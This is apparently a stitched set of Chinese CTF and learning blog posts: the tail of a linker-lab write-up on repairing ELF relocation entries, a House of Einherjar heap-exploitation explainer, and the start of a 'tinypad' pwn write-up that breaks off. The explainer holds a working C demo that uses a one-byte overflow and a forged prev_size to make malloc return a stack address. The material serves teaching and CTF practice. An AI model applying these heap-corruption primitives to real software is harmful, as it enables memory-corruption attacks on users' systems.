        if( str[i]<0x20 || str[i]>0x7E ) str[i] = ' ';
    }
    return n;
}

/*
 * Phase 5 entry point: derive CODE from PHASE5_COOKIE, encode BUF in place
 * with it, and print the encoded BUF followed by a newline.
 */
void do_phase()  {
    generate_code(PHASE5_COOKIE);
    encode(BUF);
    printf("%s\n", BUF);
}

对照 phase5.o 的反汇编程序及已有重定位记录，定位每一空重定位记录可能对应的符号引用
对每一待处理的符号引用，按照下列重定位记录结构，构造其二进制表示（8字节块）
使用 hexedit 或编程将生成的重定位记录写入到相应被清空的记录位置中

直接运行程序：（报错了）

1
2
3

➜  [/home/ywhkkx/ex1.linklab/l5] gcc -m32 -o linkbomb5 main.o phase5.o 
➜  [/home/ywhkkx/ex1.linklab/l5] ./linkbomb5 
[1]    4179 illegal hardware instruction (core dumped)  ./linkbomb5

可能实验五就是为了让我们修复程序，一般段错误有以下原因：

未对相关引用进行必要的重定位（实验 PPT 给出了这个提示）

用GDB单步排查：

Invalid instructions at 0x56556399

“do_phase”出问题了，但不知道是什么问题（其实大概率是重定位的问题，实验给了提示）

看一下重定位表：

➜  [/home/ywhkkx/ex1.linklab/l5] readelf -r phase5.o

重定位节 '.rel.text' at offset 0x6e8 contains 27 entries:
 偏移量     信息    类型              符号值      符号名称
00000000  00000000 R_386_NONE       
00000009  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000013  00001509 R_386_GOTOFF      00000000   CmhNnM
00000000  00000000 R_386_NONE       
00000000  00000000 R_386_NONE       
0000004c  00001509 R_386_GOTOFF      00000000   CmhNnM
0000005d  00001509 R_386_GOTOFF      00000000   CmhNnM
00000000  00000000 R_386_NONE       
0000007e  00001509 R_386_GOTOFF      00000000   CmhNnM
00000000  00000000 R_386_NONE       
0000009e  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
000000a7  00001809 R_386_GOTOFF      0000000b   CODE
00000000  00000000 R_386_NONE       
00000000  00000000 R_386_NONE       
000000cc  00001809 R_386_GOTOFF      0000000b   CODE
000000ea  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
00000000  00000000 R_386_NONE       
000000fb  00001f04 R_386_PLT32       00000000   strlen
00000120  00001609 R_386_GOTOFF      00000040   cRvFVR
00000127  00001809 R_386_GOTOFF      0000000b   CODE
00000000  00000000 R_386_NONE       
00000189  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000193  00001c02 R_386_PC32        00000090   generate_code
0000019f  00001709 R_386_GOTOFF      00000000   BUF
000001a5  00001e02 R_386_PC32        000000e2   encode
000001b1  00001709 R_386_GOTOFF      00000000   BUF
000001b7  00002104 R_386_PLT32       00000000   puts

重定位节 '.rel.rodata' at offset 0x7c0 contains 8 entries:
 偏移量     信息    类型              符号值      符号名称
000000c0  00000c09 R_386_GOTOFF      0000002d   .L3
000000c4  00000d09 R_386_GOTOFF      00000032   .L5
000000c8  00000a09 R_386_GOTOFF      00000087   .L2
000000cc  00000e09 R_386_GOTOFF      00000046   .L6
000000d0  00000f09 R_386_GOTOFF      00000057   .L7
000000d4  00001009 R_386_GOTOFF      00000069   .L8
000000d8  00000a09 R_386_GOTOFF      00000087   .L2
000000dc  00001109 R_386_GOTOFF      00000078   .L9

重定位节 '.rel.data.rel.local' at offset 0x800 contains 1 entry:
 偏移量     信息    类型              符号值      符号名称
00000000  00002001 R_386_32          0000017b   do_phase

重定位节 '.rel.eh_frame' at offset 0x808 contains 6 entries:
 偏移量     信息    类型              符号值      符号名称
00000020  00000202 R_386_PC32        00000000   .text
00000040  00000202 R_386_PC32        00000000   .text
00000064  00000202 R_386_PC32        00000000   .text
00000088  00000202 R_386_PC32        00000000   .text
000000ac  00000702 R_386_PC32        00000000   .text.__x86.get_pc_thu
000000c0  00000802 R_386_PC32        00000000   .text.__x86.get_pc_thu

发现很多条目空着的，需要补全

➜  [/home/ywhkkx/ex1.linklab/l5] readelf -S phase5.o
There are 20 section headers, starting at offset 0x8f0:

节头：
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .group            GROUP           00000000 000034 000008 04     17  26  4
  [ 2] .group            GROUP           00000000 00003c 000008 04     17  29  4
  [ 3] .text             PROGBITS        00000000 000044 0001c4 00  AX  0   0  1
  [ 4] .rel.text         REL             00000000 0006e8 0000d8 08   I 17   3  4
  [ 5] .data             PROGBITS        00000000 000208 00000c 00  WA  0   0  4
  [ 6] .bss              NOBITS          00000000 000214 000000 00  WA  0   0  1
  [ 7] .rodata           PROGBITS        00000000 000220 0000e0 00   A  0   0 32
  [ 8] .rel.rodata       REL             00000000 0007c0 000040 08   I 17   7  4

“.rel.rodata”偏移为“0x7c0”，“.rel.text”偏移为“0x6e8”

在 hexedit 中看看：

000006D0   64 65 00 73  74 72 6C 65  6E 00 64 6F  5F 70 68 61  de.strlen.do_pha
000006E0   73 65 00 70  75 74 73 00  00 00 00 00  00 00 00 00  se.puts.........
000006F0   09 00 00 00  0A 1B 00 00  13 00 00 00  09 15 00 00  ................
00000700   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ................
00000710   4C 00 00 00  09 15 00 00  5D 00 00 00  09 15 00 00  L.......].......
00000720   00 00 00 00  00 00 00 00  7E 00 00 00  09 15 00 00  ........~.......

可以发现一个规律，对应 ‘.rel.text’ 表中：

第一个4字节空间是偏移量
第二个4字节空间是信息（注意小端字节序）

在“0x6e8”和“0x6e8+0x4”的位置是空的，’.rel.text’ 表中空着的地方都没有数据，通过前面几个实验的观察，’.rel.text’ 表是不应该存在空数据的，所以实验五的核心就是为了把 ‘.rel.text’ 表补全

那么填入什么数据呢，需要在汇编中查看：

➜  [/home/ywhkkx/ex1.linklab/l5] objdump -d phase5.o

phase5.o：     文件格式 elf32-i386


Disassembly of section .text:

00000000 <transform_code>:
   0:	55                   	push   %ebp
   1:	89 e5                	mov    %esp,%ebp
   3:	e8 fc ff ff ff       	call   4 <transform_code+0x4> // target 0x4
   8:	05 01 00 00 00       	add    $0x1,%eax // _GLOBAL_OFFSET_TABLE_
   d:	8b 55 0c             	mov    0xc(%ebp),%edx
  10:	8b 94 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%edx // CmhNnM
  17:	83 e2 07             	and    $0x7,%edx
  1a:	83 fa 07             	cmp    $0x7,%edx
  1d:	77 68                	ja     87 <.L2>
  1f:	c1 e2 02             	shl    $0x2,%edx
  22:	8b 94 02 c0 00 00 00 	mov    0xc0(%edx,%eax,1),%edx // target 0x25
  29:	01 c2                	add    %eax,%edx
  2b:	ff e2                	jmp    *%edx

0000002d <.L3>:
  2d:	f7 55 08             	notl   0x8(%ebp)
  30:	eb 59                	jmp    8b <.L2+0x4>

00000032 <.L5>:
  32:	8b 55 0c             	mov    0xc(%ebp),%edx
  35:	8b 84 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%eax // target 0x38
  3c:	83 e0 03             	and    $0x3,%eax
  3f:	89 c1                	mov    %eax,%ecx
  41:	d3 7d 08             	sarl   %cl,0x8(%ebp)
  44:	eb 45                	jmp    8b <.L2+0x4>

00000046 <.L6>:
  46:	8b 55 0c             	mov    0xc(%ebp),%edx
  49:	8b 84 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%eax // CmhNnM
  50:	f7 d0                	not    %eax
  52:	21 45 08             	and    %eax,0x8(%ebp)
  55:	eb 34                	jmp    8b <.L2+0x4>

00000057 <.L7>:
  57:	8b 55 0c             	mov    0xc(%ebp),%edx
  5a:	8b 84 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%eax // CmhNnM
  61:	c1 e0 08             	shl    $0x8,%eax
  64:	09 45 08             	or     %eax,0x8(%ebp)
  67:	eb 22                	jmp    8b <.L2+0x4>

00000069 <.L8>:
  69:	8b 55 0c             	mov    0xc(%ebp),%edx
  6c:	8b 84 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%eax // target 0x6f
  73:	31 45 08             	xor    %eax,0x8(%ebp)
  76:	eb 13                	jmp    8b <.L2+0x4>

00000078 <.L9>:
  78:	8b 55 0c             	mov    0xc(%ebp),%edx
  7b:	8b 84 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%eax // CmhNnM
  82:	89 45 08             	mov    %eax,0x8(%ebp)
  85:	eb 04                	jmp    8b <.L2+0x4>

00000087 <.L2>:
  87:	f7 5d 08             	negl   0x8(%ebp)
  8a:	90                   	nop
  8b:	8b 45 08             	mov    0x8(%ebp),%eax
  8e:	5d                   	pop    %ebp
  8f:	c3                   	ret    

00000090 <generate_code>:
  90:	55                   	push   %ebp
  91:	89 e5                	mov    %esp,%ebp
  93:	53                   	push   %ebx
  94:	83 ec 10             	sub    $0x10,%esp
  97:	e8 fc ff ff ff       	call   98 <generate_code+0x8> // target 0x98
  9c:	81 c3 02 00 00 00    	add    $0x2,%ebx // _GLOBAL_OFFSET_TABLE_
  a2:	8b 45 08             	mov    0x8(%ebp),%eax
  a5:	88 83 00 00 00 00    	mov    %al,0x0(%ebx) // CODE
  ab:	c7 45 f8 00 00 00 00 	movl   $0x0,-0x8(%ebp) // target 0xae
  b2:	eb 20                	jmp    d4 <generate_code+0x44>
  b4:	0f b6 83 00 00 00 00 	movzbl 0x0(%ebx),%eax // target 0xb7
  bb:	0f be c0             	movsbl %al,%eax
  be:	ff 75 f8             	pushl  -0x8(%ebp)
  c1:	50                   	push   %eax
  c2:	e8 fc ff ff ff       	call   c3 <generate_code+0x33>
  c7:	83 c4 08             	add    $0x8,%esp
  ca:	88 83 00 00 00 00    	mov    %al,0x0(%ebx) // CODE
  d0:	83 45 f8 01          	addl   $0x1,-0x8(%ebp)
  d4:	8b 45 f8             	mov    -0x8(%ebp),%eax
  d7:	83 f8 08             	cmp    $0x8,%eax
  da:	76 d8                	jbe    b4 <generate_code+0x24>
  dc:	90                   	nop
  dd:	8b 5d fc             	mov    -0x4(%ebp),%ebx
  e0:	c9                   	leave  
  e1:	c3                   	ret    

000000e2 <encode>:
  e2:	55                   	push   %ebp
  e3:	89 e5                	mov    %esp,%ebp
  e5:	53                   	push   %ebx
  e6:	83 ec 14             	sub    $0x14,%esp
  e9:	e8 fc ff ff ff       	call   ea <encode+0x8> // __x86.get_pc_thunk.bx
  ee:	81 c3 02 00 00 00    	add    $0x2,%ebx // target 0xf0
  f4:	83 ec 0c             	sub    $0xc,%esp
  f7:	ff 75 08             	pushl  0x8(%ebp)
  fa:	e8 fc ff ff ff       	call   fb <encode+0x19> // strlen
  ff:	83 c4 10             	add    $0x10,%esp
 102:	89 45 f4             	mov    %eax,-0xc(%ebp)
 105:	c7 45 f0 00 00 00 00 	movl   $0x0,-0x10(%ebp) 
 10c:	eb 5d                	jmp    16b <encode+0x89>
 10e:	8b 55 f0             	mov    -0x10(%ebp),%edx
 111:	8b 45 08             	mov    0x8(%ebp),%eax
 114:	01 d0                	add    %edx,%eax
 116:	0f b6 00             	movzbl (%eax),%eax
 119:	0f be c0             	movsbl %al,%eax
 11c:	0f b6 94 03 00 00 00 	movzbl 0x0(%ebx,%eax,1),%edx // cRvFVR
 123:	00 
 124:	0f b6 83 00 00 00 00 	movzbl 0x0(%ebx),%eax // CODE
 12b:	89 d1                	mov    %edx,%ecx
 12d:	31 c1                	xor    %eax,%ecx
 12f:	8b 55 f0             	mov    -0x10(%ebp),%edx
 132:	8b 45 08             	mov    0x8(%ebp),%eax
 135:	01 d0                	add    %edx,%eax
 137:	83 e1 7f             	and    $0x7f,%ecx
 13a:	89 ca                	mov    %ecx,%edx
 13c:	88 10                	mov    %dl,(%eax)
 13e:	8b 55 f0             	mov    -0x10(%ebp),%edx
 141:	8b 45 08             	mov    0x8(%ebp),%eax
 144:	01 d0                	add    %edx,%eax
 146:	0f b6 00             	movzbl (%eax),%eax
 149:	3c 1f                	cmp    $0x1f,%al
 14b:	7e 0f                	jle    15c <encode+0x7a>
 14d:	8b 55 f0             	mov    -0x10(%ebp),%edx
 150:	8b 45 08             	mov    0x8(%ebp),%eax
 153:	01 d0                	add    %edx,%eax
 155:	0f b6 00             	movzbl (%eax),%eax
 158:	3c 7f                	cmp    $0x7f,%al
 15a:	75 0b                	jne    167 <encode+0x85>
 15c:	8b 55 f0             	mov    -0x10(%ebp),%edx
 15f:	8b 45 08             	mov    0x8(%ebp),%eax
 162:	01 d0                	add    %edx,%eax
 164:	c6 00 20             	movb   $0x20,(%eax)
 167:	83 45 f0 01          	addl   $0x1,-0x10(%ebp)
 16b:	8b 45 f0             	mov    -0x10(%ebp),%eax
 16e:	3b 45 f4             	cmp    -0xc(%ebp),%eax
 171:	7c 9b                	jl     10e <encode+0x2c>
 173:	8b 45 f4             	mov    -0xc(%ebp),%eax
 176:	8b 5d fc             	mov    -0x4(%ebp),%ebx
 179:	c9                   	leave  
 17a:	c3                   	ret    

0000017b <do_phase>:
 17b:	55                   	push   %ebp
 17c:	89 e5                	mov    %esp,%ebp
 17e:	53                   	push   %ebx
 17f:	83 ec 04             	sub    $0x4,%esp
 182:	e8 fc ff ff ff       	call   183 <do_phase+0x8> // target 0x183
 187:	81 c3 02 00 00 00    	add    $0x2,%ebx // _GLOBAL_OFFSET_TABLE_
 18d:	68 87 00 00 00       	push   $0x87
 192:	e8 fc ff ff ff       	call   193 <do_phase+0x18> // generate_code
 197:	83 c4 04             	add    $0x4,%esp
 19a:	83 ec 0c             	sub    $0xc,%esp
 19d:	8d 83 00 00 00 00    	lea    0x0(%ebx),%eax // BUF
 1a3:	50                   	push   %eax
 1a4:	e8 fc ff ff ff       	call   1a5 <do_phase+0x2a> // encode
 1a9:	83 c4 10             	add    $0x10,%esp
 1ac:	83 ec 0c             	sub    $0xc,%esp
 1af:	8d 83 00 00 00 00    	lea    0x0(%ebx),%eax // BUF
 1b5:	50                   	push   %eax
 1b6:	e8 fc ff ff ff       	call   1b7 <do_phase+0x3c> // puts
 1bb:	83 c4 10             	add    $0x10,%esp
 1be:	90                   	nop
 1bf:	8b 5d fc             	mov    -0x4(%ebp),%ebx
 1c2:	c9                   	leave  
 1c3:	c3                   	ret    

Disassembly of section .text.__x86.get_pc_thunk.ax:

00000000 <__x86.get_pc_thunk.ax>:
   0:	8b 04 24             	mov    (%esp),%eax
   3:	c3                   	ret    

Disassembly of section .text.__x86.get_pc_thunk.bx:

00000000 <__x86.get_pc_thunk.bx>:
   0:	8b 1c 24             	mov    (%esp),%ebx
   3:	c3                   	ret

主要看 “00 00 00” 和 “ff ff ff” 有没有在 ‘.rel.text’ 表中出现，把出现的标记，没有的可能就是需要修补的，最后进行修改：

➜  [/home/ywhkkx/ex1.linklab/l5] readelf -r phase5.o             

重定位节 '.rel.text' at offset 0x6e8 contains 27 entries:
 偏移量     信息    类型              符号值      符号名称
00000004  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
00000009  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000013  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
00000025  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000038  00001509 R_386_GOTOFF      00000000   CmhNnM
0000004c  00001509 R_386_GOTOFF      00000000   CmhNnM
0000005d  00001509 R_386_GOTOFF      00000000   CmhNnM
0000006f  00001509 R_386_GOTOFF      00000000   CmhNnM
0000007e  00001509 R_386_GOTOFF      00000000   CmhNnM
00000098  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
0000009e  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
000000a7  00001809 R_386_GOTOFF      0000000b   CODE
000000ae  00001809 R_386_GOTOFF      0000000b   CODE
000000b7  00001809 R_386_GOTOFF      0000000b   CODE
000000cc  00001809 R_386_GOTOFF      0000000b   CODE
000000ea  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
000000f0  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
000000fb  00001f04 R_386_PLT32       00000000   strlen
00000120  00001609 R_386_GOTOFF      00000040   cRvFVR
00000127  00001809 R_386_GOTOFF      0000000b   CODE
00000183  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
00000189  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000193  00001c02 R_386_PC32        00000090   generate_code
0000019f  00001709 R_386_GOTOFF      00000000   BUF
000001a5  00001e02 R_386_PC32        000000e2   encode
000001b1  00001709 R_386_GOTOFF      00000000   BUF
000001b7  00002104 R_386_PLT32       00000000   puts

“偏移量”很好处理，就是“信息”不好选择，我是根据“汇编代码的相似性”进行选择的，最后总算可以输出了（想要完美完成这个实验，必须掌握汇编）

➜  [/home/ywhkkx/ex1.linklab/l5] ./linkbomb5
PP$;`;;``;

没有段错误了，但是输出很奇怪（有些地方没有改好）

收获

以前就对 link 有困惑，做了这个实验感受了一下 link 的过程后，发现自己对 link 的理解更清晰了
学习到了 objdump，readelf，hexedit 等工具的用法
看到了各个节在二进制文件的分布，学会了用“节偏移”和“节内偏移”来寻找需要的数据

House Of Einherjar-原理

Posted on 2022-03-08 In HouseOfSeries 5.1k 5 mins.

House Of Einherjar

house of einherjar 跟 house of force 差不多，最终目的都是控制 top chunk 的值

该技术可以强制使得malloc返回一个几乎任意地址的 chunk

House Of Einherjar 利用姿势

伪造一个 chunk，计算最后一个 chunk 到我们伪造 chunk 的距离，设置为最后一个 chunk 的 prev_size 位，当 free 最后一个 chunk 时，会将伪造的 chunk 和当前 chunk 和 top chunk 进行 unlink 操作，合并成一个 top chunk，从而达到将 top chunk 设置到我们伪造 chunk 的地址

// 和 house of force 不同，想要控制目标区域的 offset（fake_presize）通常为正

通过 off-by-one 把最后一个 chunk 的 prev_inuse 标志位置零，让 free 函数以为上一个 chunk 已经被 free，这就要求最后一个 chunk 的 size 不小于 0x100（off-by-one 写入的“\x00”会覆盖 size 字段的最低字节，若 size 小于 0x100，整个 size 就会被清零），要不然会在与 top chunk 进行合并操作的时候失败

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
 * House of Einherjar demonstration.
 *
 * Allocates two adjacent heap chunks (a, b), builds a fake chunk on the stack,
 * then uses a single NUL-byte overflow from 'a' to clear the PREV_INUSE bit in
 * b's size field and plants a crafted prev_size in front of b. Freeing b makes
 * the allocator consolidate backward onto the fake chunk, so the following
 * malloc() returns memory inside fake_chunk.
 *
 * The out-of-bounds writes below are intentional; this program only behaves as
 * described on the glibc version the article targets.
 */
int main()
{
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    uint8_t* a;
    uint8_t* b;
    uint8_t* d;

    a = (uint8_t*)malloc(0x38);
    printf("a: %p\n", a);

    /* Usable size of 'a' after rounding; a[real_a_size] is the first byte past it. */
    int real_a_size = malloc_usable_size(a);
    printf("Since we want to overflow 'a', we need the 'real' size of 'a' after rounding:%#x\n", real_a_size);

    /* Fake chunk header on the stack: [0] prev_size, [1] size, [2] fd, [3] bk,
     * [4]/[5] the next-size links. All links point back at the fake chunk itself. */
    size_t fake_chunk[6];

    fake_chunk[0] = 0x100;
    fake_chunk[1] = 0x100;
    fake_chunk[2] = (size_t)fake_chunk;
    fake_chunk[3] = (size_t)fake_chunk;
    fake_chunk[4] = (size_t)fake_chunk;
    fake_chunk[5] = (size_t)fake_chunk;
    printf("Our fake chunk at %p looks like:\n", fake_chunk);

    b = (uint8_t*)malloc(0xf8);
    int real_b_size = malloc_usable_size(b);
    printf("b: %p\n", b);

    /* b's size field sits in the 8 bytes immediately before its user data. */
    uint64_t* b_size_ptr = (uint64_t*)(b - 8);
    printf("\nb.size: %#lx\n", *b_size_ptr); // before the overflow: b.size = 0x101 (0xf8 + 0x8 + PREV_INUSE bit)
    a[real_a_size] = 0; // one-byte overflow into the low byte of b's size field (b's prev_size field is part of a's usable data)
    printf("b.size: %#lx\n", *b_size_ptr); // after the overflow: b.size = 0x100 (the trailing PREV_INUSE bit is cleared)

    /* Distance from the fake chunk to b's chunk header; it wraps to a huge
     * unsigned value because the stack lies above the heap. */
    size_t fake_size = (size_t)((b - sizeof(size_t) * 2) - (uint8_t*)fake_chunk);
    printf("Our fake prev_size will be %p - %p = %#lx\n", b - sizeof(size_t) * 2, fake_chunk, fake_size);
    *(size_t*)&a[real_a_size - sizeof(size_t)] = fake_size; // overwrite b's prev_size field (the last word of a's data)

    /* Keep the fake chunk's own size consistent with the prev_size planted above. */
    fake_chunk[1] = fake_size;

    free(b); // free chunk b; the top chunk ends up relocated to &fake_chunk
    printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

    d = malloc(0x200); 
    printf("Next malloc(0x200) is at %p\n", d); // prints the address of fake_chunk's data area
}

覆盖前：

pwndbg> x/20xg 0x55555555b000
0x55555555b000:	0x0000000000000000	0x0000000000000041
0x55555555b010:	0x0000000000000000	0x0000000000000000
0x55555555b020:	0x0000000000000000	0x0000000000000000
0x55555555b030:	0x0000000000000000	0x0000000000000000
0x55555555b040:	0x0000000000000000	0x0000000000000101
0x55555555b050:	0x0000000000000000	0x0000000000000000

覆盖后：（ a[real_a_size] = 0 ）

pwndbg> x/20xg 0x55555555b000
0x55555555b000:	0x0000000000000000	0x0000000000000041
0x55555555b010:	0x0000000000000000	0x0000000000000000
0x55555555b020:	0x0000000000000000	0x0000000000000000
0x55555555b030:	0x0000000000000000	0x0000000000000000
0x55555555b040:	0x0000000000000000	0x0000000000000100
0x55555555b050:	0x0000000000000000	0x0000000000000000

修改后：（ *(size_t*)&a[real_a_size - sizeof(size_t)] = fake_size ）

pwndbg> x/20xg 0x55555555b000
0x55555555b000:	0x0000000000000000	0x0000000000000041
0x55555555b010:	0x0000000000000000	0x0000000000000000
0x55555555b020:	0x0000000000000000	0x0000000000000000
0x55555555b030:	0x0000000000000000	0x0000000000000000
0x55555555b040:	0xffffd5555555d2f0	0x0000000000000100
0x55555555b050:	0x0000000000000000	0x0000000000000000

释放后：（ free(b) ）

pwndbg> heap
Allocated chunk
Addr: 0x7ffffffde010 /* GDB显示有误(控制了topchunk之后,GDB就显示不准确了) */
Size: 0x00

结果：（显示的地址和上述GDB调试的地址不同，因为这是两个不同的进程）

➜  [/home/ywhkkx/桌面] ./test
a: 0x560df0294010
Since we want to overflow 'a', we need the 'real' size of 'a' after rounding:0x38
Our fake chunk at 0x7ffcea6130c0 looks like:
b: 0x560df0294050

b.size: 0x101
b.size: 0x100
Our fake prev_size will be 0x560df0294040 - 0x7ffcea6130c0 = 0xffffd61105c80f80
Our fake chunk size is now 0xffffd61105ca1f41 (b.size + fake_prev_size)
Next malloc(0x200) is at 0x7ffcea6130d0 // 申请到了0x7ffcea6130c0的数据区

总而言之，利用手段为：

已有两个 chunk（最后一个chunk，和倒数第二个chunk），释放倒数第二个 chunk
重新把倒数第二个 chunk 申请回来，在最后一个内存空间（lastchunk->presize）的位置写入 offset（可以索引到 fakechunk），同时溢出“\x00”覆盖 lastchunk 的P位（lastchunk->size）
提前在 fakechunk 处伪造好数据：presize（offset），size，FD，BK，FDsize，BKsize
释放 lastchunk

向后合并机制与利用点

下面是向后合并的源码（该片段取自早期的 ptmalloc 实现；libc-2.23 的 _int_free 中逻辑相同，只是改用 prev_inuse(p) 判断 P 位，并直接调用 unlink(av, p, bck, fwd)）：

1	#define chunk_at_offset(p, s) BOUNDED_1((mchunkptr)(((char*)(p)) + (s)))

/* Backward consolidation: runs only when the PREV_INUSE bit of the chunk being
 * freed is clear, i.e. the allocator believes the previous chunk is free. */
if (!(hd & PREV_INUSE))                    /* consolidate backward */
{ 
  prevsz = p->prev_size; 
    /* Read the prev_size field stored in chunk p's own header. */
  p = chunk_at_offset(p, -(long)prevsz); 
    /* p is recomputed purely from prev_size: it now points prevsz bytes
       before its old position, which is taken to be the previous chunk.
       The prev_size value is not validated here. */
  sz += prevsz; 
    /* size = size + prev_size */

  if (p->fd == last_remainder(ar_ptr))     /* keep as last_remainder */
    islr = 1;
  else
    unlink(p, bck, fwd);
    /* Run the unlink checks and take the (previous) chunk off its bin list. */
}

可以看到执行 set_head() 函数后，合并堆块的 size 会变为两个堆块的总和，并且 top_chunk 的指针会指向被合并的堆块 p 的位置，就相当于 top_chunk 把 p 给吞了，并取代了 p 的位置

可以发现程序并没有对 向后合并 进行过多的检查，不管 presize 是多少都是合理的

保护检查：后向合并中没有多少检查，但是unlink操作会先检查 “fakechunk->size” （必须可以通过 size 索引到“last chunk”，并且P位为“0”，这样才会进行 unlink），因为“fake_size”（offset）很大，fake chunk 会被当做是 large chunk ，所以还会格外检查 FD，BK，FDsize，BKsize

破解办法：控制“fake chunk”，写入“fake_size”，在“FD，BK，FDsize，BKsize”中写入“fake chunk addr”就可以通过检查（至少在 libc-2.23 是这样的）

利用条件：

用户能够篡改 top chunk 的 presize 字段（篡改为负数或很大值）
有 off-by-one ，可以覆盖最后一个chunk的P位为“\x00”（使其在和 top chunk 合并后还可以进行后向合并，通过“chunk->presize”索引到“fake chunk”把 top chunk 合并到“fake chunk”上）
可以控制“fake chunk”

版本对 House Of Einherjar 的影响

libc-2.23

基本没有影响，可以直接打

House Of Einherjar-2.23-64

Posted on 2022-03-08 Edited on 2022-11-10 In Pwn train 18k 16 mins.

tinypad

➜  [/home/ywhkkx/桌面] ./tinypad 

  ============================================================================
// _|_|_|_|_|  _|_|_|  _|      _|  _|      _|  _|_|_|      _|_|    _|_|_|     \\
||     _|        _|    _|_|    _|    _|  _|    _|    _|  _|    _|  _|    _|   ||
||     _|        _|    _|  _|  _|      _|      _|_|_|    _|_|_|_|  _|    _|   ||
||     _|        _|    _|    _|_|      _|      _|        _|    _|  _|    _|   ||
\\     _|      _|_|_|  _|      _|      _|      _|        _|    _|  _|_|_|     //
  ============================================================================

+------------------------------------------------------------------------------+

 #   INDEX: 1
 # CONTENT: 

+------------------------------------------------------------------------------+

 #   INDEX: 2
 # CONTENT: 

+------------------------------------------------------------------------------+

 #   INDEX: 3
 # CONTENT: 

+------------------------------------------------------------------------------+

 #   INDEX: 4
 # CONTENT: 

+- MENU -----------------------------------------------------------------------+
| [A] Add memo                                                                 |
| [D] Delete memo                                                              |
| [E] Edit memo                                                                |
| [Q] Quit                                                                     |
+------------------------------------------------------------------------------+
(CMD)>>>

tinypad: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1333a912c440e714599a86192a918178f187d378, not stripped

[*] '/home/ywhkkx/桌面/tinypad'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

64位，Full RELRO，开了 canary，开了 NX，未开 PIE

/*
 * tinypad main loop (Hex-Rays pseudocode with hand-renamed locals).
 *
 * Every iteration prints the four memo slots, reads a command via getcmd() and
 * dispatches on it: 'A' adds a memo, 'D' deletes one, 'E' edits one, 'Q' ends
 * the loop; anything else prints "No such a command".
 *
 * Slot layout, as implied by the indexing below: for a 0-based slot i the size
 * field is at chunk_list[16 * i + 256] and the data pointer at
 * chunk_list[16 * i + 264]. The delete and edit paths use the 1-based index
 * typed by the user, which is why they address the same fields with the
 * offsets +240 (size) and +248 (pointer). The bytes at the start of chunk_list
 * are used as a scratch buffer by the edit path.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rax
  int choice; // eax
  int v5; // eax
  __int64 len; // rax
  unsigned __int64 len_data; // rax
  int c; // [rsp+4h] [rbp-1Ch] BYREF
  int i; // [rsp+8h] [rbp-18h]
  int index; // [rsp+Ch] [rbp-14h]
  int v12; // [rsp+10h] [rbp-10h]
  int size; // [rsp+14h] [rbp-Ch]
  unsigned __int64 v14; // [rsp+18h] [rbp-8h]

  v14 = __readfsqword(0x28u);
  v12 = 0;
  write_n((__int64)&leak_addr, 1uLL);
  write_n(
    (__int64)"  ============================================================================\n"
             "// _|_|_|_|_|  _|_|_|  _|      _|  _|      _|  _|_|_|      _|_|    _|_|_|     \\\\\n"
             "||     _|        _|    _|_|    _|    _|  _|    _|    _|  _|    _|  _|    _|   ||\n"
             "||     _|        _|    _|  _|  _|      _|      _|_|_|    _|_|_|_|  _|    _|   ||\n"
             "||     _|        _|    _|    _|_|      _|      _|        _|    _|  _|    _|   ||\n"
             "\\\\     _|      _|_|_|  _|      _|      _|      _|        _|    _|  _|_|_|     //\n"
             "  ============================================================================\n",
    0x233uLL);
  write_n((__int64)&leak_addr, 1uLL);
  do
  {
    // Dump all four slots. A slot's content is printed whenever its pointer is
    // non-zero; the size field is not consulted here.
    for ( i = 0; i <= 3; ++i )
    {
      LOBYTE(c) = i + 49;                       // ASCII digit '1'..'4'
      writeln((__int64)"+------------------------------------------------------------------------------+\n", 81LL);
      write_n((__int64)" #   INDEX: ", 0xCuLL);
      writeln((__int64)&c, 1LL);
      write_n((__int64)" # CONTENT: ", 0xCuLL);
      if ( *(_QWORD *)&chunk_list[16 * i + 264] )
      {
        v3 = strlen(*(const char **)&chunk_list[16 * i + 264]);
        writeln(*(_QWORD *)&chunk_list[16 * i + 264], v3);
      }
      writeln((__int64)&leak_addr, 1LL);
    }
    index = 0;
    choice = getcmd();
    v12 = choice;
    if ( choice == 'D' )                        // Delete memo 
    {
      write_n((__int64)"(INDEX)>>> ", 0xBuLL);
      index = read_int();
      if ( index <= 0 || index > 4 )            // accepted index range is 1..4
      {
LABEL_29:
        writeln((__int64)"Invalid index", 13LL);
        continue;
      }
      if ( !*(_QWORD *)&chunk_list[16 * index + 240] )
      {
LABEL_31:
        writeln((__int64)"Not used", 8LL);
        continue;
      }
      free(*(void **)&chunk_list[16 * index + 248]);
